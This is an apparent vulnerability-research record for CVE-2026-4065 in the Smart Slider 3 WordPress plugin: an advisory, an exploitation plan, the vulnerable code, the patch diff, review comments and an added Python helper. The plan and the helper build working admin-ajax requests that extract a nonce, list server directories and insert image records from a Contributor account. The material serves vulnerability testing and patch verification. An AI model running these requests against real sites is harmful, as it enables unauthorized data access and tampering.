[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fz9uUVA8hiYulnCN4sZWv3ogvEE8qXGJGriM_D-tIXOY":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":34,"research_vulnerable_code":35,"research_fix_diff":36,"research_exploit_outline":37,"research_model_used":38,"research_started_at":39,"research_completed_at":40,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":41},"CVE-2026-4065","smart-slider-3-missing-authorization-to-authenticated-contributor-slider-data-read-and-image-record-manipulation","Smart Slider 3 \u003C= 3.5.1.33 - Missing Authorization to Authenticated (Contributor+) Slider Data Read and Image Record Manipulation","The Smart Slider 3 plugin for WordPress is vulnerable to unauthorized access and modification of data due to missing capability checks on multiple wp_ajax_smart-slider3 controller actions in all versions up to, and including, 3.5.1.33. The display_admin_ajax() method does not call checkForCap() (which requires unfiltered_html capability), and several controller actions only validate the nonce (validateToken()) without calling validatePermission(). 
This makes it possible for authenticated attackers, with Contributor-level access and above, to enumerate slider metadata and create, modify, and delete image storage records by obtaining the nextend_nonce exposed on post editor pages.","smart-slider-3",null,"\u003C=3.5.1.33","3.5.1.34","medium",5.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:L\u002FI:L\u002FA:N","Missing Authorization","2026-04-07 08:51:34","2026-04-07 21:26:20",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F53a08b59-b7e0-419a-bfc3-528bcddb1ac2?source=api-prod",1,[22,23,24,25,26,27,28,29],"Nextend\u002FFramework\u002FAsset\u002FCss\u002FLess\u002FLessCompiler.php","Nextend\u002FFramework\u002FAsset\u002FPredefined.php","Nextend\u002FFramework\u002FBrowse\u002FControllerAjaxBrowse.php","Nextend\u002FFramework\u002FFont\u002FSources\u002FGoogleFonts\u002Ffamilies.csv","Nextend\u002FFramework\u002FImage\u002FControllerAjaxImage.php","Nextend\u002FFramework\u002FImage\u002FImageEdit.php","Nextend\u002FLanguages\u002Fsmartslider3.pot","Nextend\u002FSmartSlider3\u002FApplication\u002FAdmin\u002FSettings\u002FViewSettingsGeneral.php","researched",false,3,"# Detailed Exploitation Research Plan: CVE-2026-4065\n\n## 1. Vulnerability Summary\nThe Smart Slider 3 plugin (up to and including 3.5.1.33) contains a missing authorization vulnerability in its AJAX handling logic. Specifically, the plugin uses a base controller `AdminAjaxController` that handles various actions via the `wp_ajax_smart-slider3` hook. While the plugin implements nonce validation (`validateToken()`), it fails to perform capability checks (`checkForCap()` or `validatePermission()`) in several sensitive controller actions. 
\n\nAs a result, any authenticated user with access to a page where the `nextend_nonce` is exposed (such as the WordPress post editor) can perform actions intended for administrators, including listing filesystem directories (Information Disclosure) and creating or manipulating image storage records in the database.\n\n## 2. Attack Vector Analysis\n- **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n- **AJAX Action:** `smart-slider3`\n- **Vulnerable Parameters:** \n    - `nextendcontroller`: The target controller (e.g., `browse` or `image`).\n    - `nextendaction`: The target method (e.g., `index` or `addVisual`).\n    - `nextend_nonce`: The CSRF token required for validation.\n- **Authentication:** Contributor level or higher.\n- **Preconditions:** The attacker must be authenticated as a Contributor to access the post editor and retrieve the required nonce.\n\n## 3. Code Flow\n1. **Entry Point:** A request is sent to `admin-ajax.php?action=smart-slider3`.\n2. **Routing:** The plugin routes the request based on `nextendcontroller`. \n3. **Missing Check:** In `Nextend\u002FFramework\u002FBrowse\u002FControllerAjaxBrowse.php`, the `actionIndex()` method is invoked.\n    - Line 19: `$this->validateToken();` is called (verifies `nextend_nonce`).\n    - **Vulnerability:** No call to `$this->validatePermission()` or `current_user_can()` follows.\n4. **Execution (Browse):**\n    - The code calculates a path relative to `Filesystem::getImagesFolder()`.\n    - It uses `glob()` and `scandir()` to list contents.\n    - Line 95: Returns a JSON response containing the filesystem structure.\n5. **Execution (Image Manipulation):**\n    - In `Nextend\u002FFramework\u002FImage\u002FControllerAjaxImage.php`, `actionAddVisual()` (Line 38) calls `$this->validateToken()`.\n    - It proceeds to call `$model->addVisual()` which writes to the database without verifying if the user has permission to manage slider images.\n\n## 4. 
Nonce Acquisition Strategy\nThe `nextend_nonce` is localized for the backend editor. \n1. **Authentication:** Log in as a Contributor user.\n2. **Access Editor:** Navigate to the new post page (`\u002Fwp-admin\u002Fpost-new.php`).\n3. **Script Trigger:** Smart Slider 3 enqueues its assets on the editor page to support the \"Smart Slider\" button in the editor toolbar.\n4. **JS Variable Extraction:** The nonce is stored within the `_N2` JavaScript object, specifically inside the `AjaxHelper` configuration.\n    - Evaluate the following in the browser's developer console to read it:\n      ```javascript\n      _N2.AjaxHelper.ajaxArray['nextend_nonce']\n      ```\n    - Alternatively, it may be found in the global scope if localized via `wp_localize_script`.\n\n## 5. Exploitation Strategy\n\n### Step 1: Directory Enumeration (Read Access)\nList the contents of the WordPress uploads directory (the plugin's image root) to identify sensitive files or folder structures.\n- **HTTP Request:**\n    ```http\n    POST \u002Fwp-admin\u002Fadmin-ajax.php?action=smart-slider3&nextendcontroller=browse&nextendaction=index HTTP\u002F1.1\n    Content-Type: application\u002Fx-www-form-urlencoded\n\n    path=\u002F&nextend_nonce=[EXTRACTED_NONCE]\n    ```\n- **Expected Response:** A JSON object containing `directories` and `files` keys listing the contents of the base image folder.\n\n### Step 2: Image Record Manipulation (Write Access)\nInsert an attacker-controlled image storage record.\n- **HTTP Request:**\n    ```http\n    POST \u002Fwp-admin\u002Fadmin-ajax.php?action=smart-slider3&nextendcontroller=image&nextendaction=addVisual HTTP\u002F1.1\n    Content-Type: application\u002Fx-www-form-urlencoded\n\n    image=vulnerable_test_image.png&value=payload_data_here&nextend_nonce=[EXTRACTED_NONCE]\n    ```\n- **Expected Response:** A JSON object with the `visual` data, including a new `visualId`, confirming the record was created in the database.\n\n## 6. Test Data Setup\n1. 
Create a Contributor user: `wp user create attacker attacker@example.com --role=contributor --user_pass=password123`.\n2. Ensure Smart Slider 3 is active.\n3. (Optional) Create at least one slider to ensure the plugin's database tables are initialized: `wp eval \"Nextend\\SmartSlider3\\Slider\\ModelSlider::create(array('title' => 'Test Slider'));\"`.\n\n## 7. Expected Results\n- The `browse\u002Findex` request should return a listing of the `wp-content\u002Fuploads` directory (or the plugin's configured image root).\n- The `image\u002FaddVisual` request should return a success status and a `visualId`, indicating that a Contributor successfully modified the image metadata store, which normally requires `unfiltered_html` or Administrator privileges.\n\n## 8. Verification Steps\nAfter performing the HTTP requests:\n1. **Check Directory Access:** Verify the JSON response from `browse\u002Findex` matches the actual filesystem.\n    - `ls -R wp-content\u002Fuploads`\n2. **Check Database Records:** Query the database to see if the visual record was inserted.\n    - `wp db query \"SELECT * FROM wp_nextend2_image_storage WHERE image = 'vulnerable_test_image.png';\"`\n    - Note: The table name prefix might vary based on the environment (usually `wp_nextend2_image_storage`).\n\n## 9. Alternative Approaches\nIf `nextendcontroller=browse` is blocked or patched differently:\n- **Delete Visuals:** Attempt to delete existing image visuals using `nextendcontroller=image&nextendaction=deleteVisual&visualId=[ID]`.\n- **Enumerate Subdirectories:** Try path traversal-like structures in the `path` parameter (e.g., `path=..\u002F..\u002F`) to see if the `realpath` check in `ControllerAjaxBrowse.php` (Line 24) can be subverted, although it appears to attempt to anchor to the root.","The Smart Slider 3 plugin lacks authorization checks on several AJAX controller actions, including directory browsing and image metadata manipulation. 
This allows authenticated users with Contributor-level access to enumerate files on the server and modify slider-related database records by exploiting a nonce exposed in the post editor.","\u002F\u002F Nextend\u002FFramework\u002FBrowse\u002FControllerAjaxBrowse.php:17\npublic function actionIndex() {\n    $this->validateToken();\n    $requestedPath = Request::$REQUEST->getVar('path', '');\n\n    $root = Filesystem::convertToRealDirectorySeparator(Filesystem::getImagesFolder());\n\n---\n\n\u002F\u002F Nextend\u002FFramework\u002FImage\u002FControllerAjaxImage.php:37\npublic function actionAddVisual() {\n    $this->validateToken();\n\n    $image = Request::$REQUEST->getVar('image');\n    $this->validateVariable(!empty($image), 'image');\n\n    $model = $this->getModel();\n\n    if (($visual = $model->addVisual($image, Request::$REQUEST->getVar('value')))) {\n---\n\n\u002F\u002F Nextend\u002FFramework\u002FImage\u002FControllerAjaxImage.php:54\npublic function actionDeleteVisual() {\n    $this->validateToken();\n\n    $visualId = Request::$REQUEST->getInt('visualId');","diff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fsmart-slider-3\u002F3.5.1.32\u002FNextend\u002FFramework\u002FImage\u002FControllerAjaxImage.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fsmart-slider-3\u002F3.5.1.34\u002FNextend\u002FFramework\u002FImage\u002FControllerAjaxImage.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fsmart-slider-3\u002F3.5.1.32\u002FNextend\u002FFramework\u002FImage\u002FControllerAjaxImage.php\t2021-06-10 11:12:12.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fsmart-slider-3\u002F3.5.1.34\u002FNextend\u002FFramework\u002FImage\u002FControllerAjaxImage.php\t2026-03-24 07:41:32.000000000 +0000\n@@ -36,6 +36,7 @@\n \n     public function actionAddVisual() {\n         $this->validateToken();\n+        
$this->validatePermission('smartslider_edit');\n \n         $image = Request::$REQUEST->getVar('image');\n         $this->validateVariable(!empty($image), 'image');\n@@ -54,6 +55,7 @@\n \n     public function actionDeleteVisual() {\n         $this->validateToken();\n+        $this->validatePermission('smartslider_delete');\n \n         $visualId = Request::$REQUEST->getInt('visualId');\n         $this->validateVariable($visualId > 0, 'image');\n@@ -72,6 +74,7 @@\n \n     public function actionChangeVisual() {\n         $this->validateToken();\n+        $this->validatePermission('smartslider_edit');\n \n         $visualId = Request::$REQUEST->getInt('visualId');\n         $this->validateVariable($visualId > 0, 'image');","1. Authenticate to the WordPress site as a Contributor or higher.\n2. Access the WordPress post editor (e.g., `\u002Fwp-admin\u002Fpost-new.php`) and extract the `nextend_nonce` from the `_N2` global JavaScript object (specifically within `_N2.AjaxHelper.ajaxArray`).\n3. To enumerate directories: Send a POST request to `\u002Fwp-admin\u002Fadmin-ajax.php?action=smart-slider3&nextendcontroller=browse&nextendaction=index` with parameters `path=\u002F` and the stolen `nextend_nonce`. The response will contain a directory and file listing for the uploads directory.\n4. To manipulate image records: Send a POST request to `\u002Fwp-admin\u002Fadmin-ajax.php?action=smart-slider3&nextendcontroller=image&nextendaction=addVisual` with the stolen `nextend_nonce`, an `image` name, and a `value` containing arbitrary metadata. 
This injects a record into the image storage database table.","gemini-3-flash-preview","2026-04-17 20:58:23","2026-04-17 20:58:52",{"type":42,"vulnerable_version":43,"fixed_version":11,"vulnerable_browse":44,"vulnerable_zip":45,"fixed_browse":46,"fixed_zip":47,"all_tags":48},"plugin","3.5.1.32","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fsmart-slider-3\u002Ftags\u002F3.5.1.32","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fsmart-slider-3.3.5.1.32.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fsmart-slider-3\u002Ftags\u002F3.5.1.34","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fsmart-slider-3.3.5.1.34.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fsmart-slider-3\u002Ftags"]
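Review bot: the guard added to actionAddVisual in the first hunk of the research_fix_diff is placed per action, and the diff shown covers only Nextend/Framework/Image/ControllerAjaxImage.php even though patch_diff_files also lists Nextend/Framework/Browse/ControllerAjaxBrowse.php, whose actionIndex() the advisory names as the directory-listing path. Confirm that ControllerAjaxBrowse.php received an equivalent `$this->validatePermission(...)` call after its `$this->validateToken();`, and consider hoisting the permission check into the shared AdminAjaxController (or display_admin_ajax(), which the description says skips checkForCap()) so that a future action cannot omit it the way these three did.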
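Review bot: the second hunk (actionDeleteVisual) uses `$this->validatePermission('smartslider_delete');` while the other two use 'smartslider_edit'; if validatePermission() maps these names to distinct WordPress capabilities, the roles that carry each should be documented, since the advisory's stated threshold for these handlers was the unfiltered_html check in checkForCap(). Minor, in the unchanged context of the same hunk: `$this->validateVariable($visualId > 0, 'image');` labels the failing field as 'image' although the value validated is visualId, which makes the error response misleading.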
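Review bot: the third hunk (actionChangeVisual) completes the set, but the diff is taken between 3.5.1.32 and 3.5.1.34 while the advisory lists 3.5.1.33 as the last affected release, and the file header timestamps (2021 for the old file, 2026 for the new) suggest the file had no intervening changes; confirm that these three inserted lines, plus whatever landed in ControllerAjaxBrowse.php, are the complete authorization fix in 3.5.1.34 and that no other action in ControllerAjaxImage.php still opens with validateToken() alone.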
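The plan's sections 4 and 5 (nonce acquisition, then the browse/index and image/addVisual requests) and its section 7 (expected results) describe a procedure a tester repeats by hand. The following is an added example, not code from the advisory, the Wordfence entry or the Smart Slider 3 plugin: offline helpers that decide whether a reported plugin version falls in the affected range, pull the `nextend_nonce` out of saved post-editor HTML, build the two admin-ajax requests exactly as the plan spells them, and classify the server's reply. Assumptions not confirmed by the page: that the nonce appears in the editor HTML as a `"nextend_nonce":"…"` pair inside Smart Slider's inline script (WordPress nonces from `wp_create_nonce()` are 10 hex characters), and that a refused request returns something other than the `directories`/`files` or `visual`/`visualId` JSON the plan expects. The sample HTML and the sample responses are constructed for this example.

```python
"""Added example (not Smart Slider 3 code): offline helpers for CVE-2026-4065 testing."""
import json
import re
from typing import Any, Optional, Tuple
from urllib.parse import urlencode

PATCHED_VERSION = "3.5.1.34"        # first release with validatePermission() on these actions
ADMIN_AJAX = "/wp-admin/admin-ajax.php"

# Constructed sample of what the post editor might inline (assumed shape, not captured).
SAMPLE_EDITOR_HTML = (
    '<script>window._N2=window._N2||{};'
    '_N2.r("AjaxHelper",function(){_N2.AjaxHelper.ajaxArray={'
    '"nextend_nonce":"a1b2c3d4e5","nextendcontroller":"ajax"};});</script>'
)

# Assumption: the nonce is serialised as key/value with a 10-hex-char wp_create_nonce() value.
NONCE_RE = re.compile(r'nextend_nonce["\']?\s*[:=]\s*["\']([0-9a-f]{10})["\']')


def version_tuple(version: str) -> Tuple[int, ...]:
    return tuple(int(part) for part in version.split("."))


def is_vulnerable(version: str) -> bool:
    """All releases up to and including 3.5.1.33 lack the capability checks."""
    return version_tuple(version) < version_tuple(PATCHED_VERSION)


def extract_nonce(html: str) -> Optional[str]:
    """First nextend_nonce found in editor-page HTML, or None when the plugin's JS is absent."""
    match = NONCE_RE.search(html)
    return match.group(1) if match else None


def browse_request(nonce: str, path: str = "/") -> Tuple[str, str]:
    """(URL path with query, form body) for browse/index, the directory-listing action."""
    query = urlencode({"action": "smart-slider3",
                       "nextendcontroller": "browse", "nextendaction": "index"})
    body = urlencode({"path": path, "nextend_nonce": nonce})
    return f"{ADMIN_AJAX}?{query}", body


def add_visual_request(nonce: str, image: str, value: str) -> Tuple[str, str]:
    """(URL path with query, form body) for image/addVisual, the record-writing action."""
    query = urlencode({"action": "smart-slider3",
                       "nextendcontroller": "image", "nextendaction": "addVisual"})
    body = urlencode({"image": image, "value": value, "nextend_nonce": nonce})
    return f"{ADMIN_AJAX}?{query}", body


def classify_browse_response(body: str) -> str:
    """'listing' when the reply carries the directories/files keys the plan expects,
    'denied' for any other JSON value, 'unexpected' when the body is not JSON at all."""
    try:
        data = json.loads(body)
    except ValueError:
        return "unexpected"
    if isinstance(data, dict) and "directories" in data and "files" in data:
        return "listing"
    return "denied"


def _find_key(obj: Any, key: str) -> Any:
    """Depth-first search for a key, so a wrapped {"data": {...}} reply is still recognised."""
    if isinstance(obj, dict):
        if key in obj:
            return obj[key]
        children = obj.values()
    elif isinstance(obj, list):
        children = obj
    else:
        return None
    for child in children:
        found = _find_key(child, key)
        if found is not None:
            return found
    return None


def classify_add_visual_response(body: str) -> str:
    """'created' when a positive visualId comes back (record inserted), else 'denied'/'unexpected'."""
    try:
        data = json.loads(body)
    except ValueError:
        return "unexpected"
    visual_id = _find_key(data, "visualId")
    try:
        return "created" if visual_id is not None and int(visual_id) > 0 else "denied"
    except (TypeError, ValueError):
        return "denied"


def send(base_url: str, cookie: str, url_path: str, body: str) -> str:
    """Online step, not exercised offline: POST one prepared request with the Contributor's
    session cookie and return the raw response body for the classifiers above."""
    import urllib.request
    req = urllib.request.Request(
        base_url.rstrip("/") + url_path, data=body.encode(),
        headers={"Cookie": cookie, "Content-Type": "application/x-www-form-urlencoded"})
    with urllib.request.urlopen(req) as resp:
        return resp.read().decode()
```

On a live target the flow is `nonce = extract_nonce(editor_html)`, then `classify_browse_response(send(base, cookie, *browse_request(nonce)))`; a `listing` from a Contributor session on a version where `is_vulnerable()` is false means the fix did not reach that controller and should be reported. The `_N2.AjaxHelper.ajaxArray['nextend_nonce']` console expression from section 4 remains the authoritative way to read the nonce when the static pattern misses.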